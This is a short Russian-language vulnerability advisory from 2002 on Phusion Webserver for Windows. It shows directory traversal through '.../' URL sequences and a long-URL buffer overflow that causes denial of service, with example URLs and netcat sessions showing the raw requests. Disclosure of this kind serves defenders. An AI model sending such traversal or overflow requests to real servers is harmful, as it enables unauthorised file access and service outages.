Множественные уязвимости в Phusion Webserver

Свойства

Дата публикации:
20.02.2002

Код

Phusion Webserver – Web сервер для Windows 9x/NT/2000. Ошибка позволяет любому пользователю обращаться к любому каталогу на диске, удаленно загружать файлы и переполнять буфер.

a. Directory Traversal
Используя специально обработанный URL, состоящий из последовательности символов "... / ", можно получить доступ к любому файлу на диске. Пример:

http://www.example.com/.../.../.../.../test.txt
sh-2.04# nc -vvn 10.0.0.1 80
(UNKNOWN) [10.0.0.1] 80 (?) open
GET /.../.../.../.../test.txt HTTP /1.0
HAVE Fun! , i seen this file remote ;-)
/Alex Hernandez!
sent 41, rcvd 70
sh-2.04#
b. Denial Of Service и переполнение буфера

Сервер зависнет при получении очень длинного URL:
http://10.0.0.1/cgi-bin/AAAAAAAAA...(Ax2500)...AAA
sh-2.04# nc -vvn 10.0.0.1 80
(UNKNOWN) [10.0.0.1] 80 (?) open
GET /cgi-bin/.../.../.../.../ HTTP/1.0
sent 42, rcvd 0
sh-2.04#
для восстановления нормальной работы потребуется перезагрузка сервера. Так как происходит переполнение буфера, то так же возможно выполнение произвольного кода.
 


или введите имя

CAPTCHA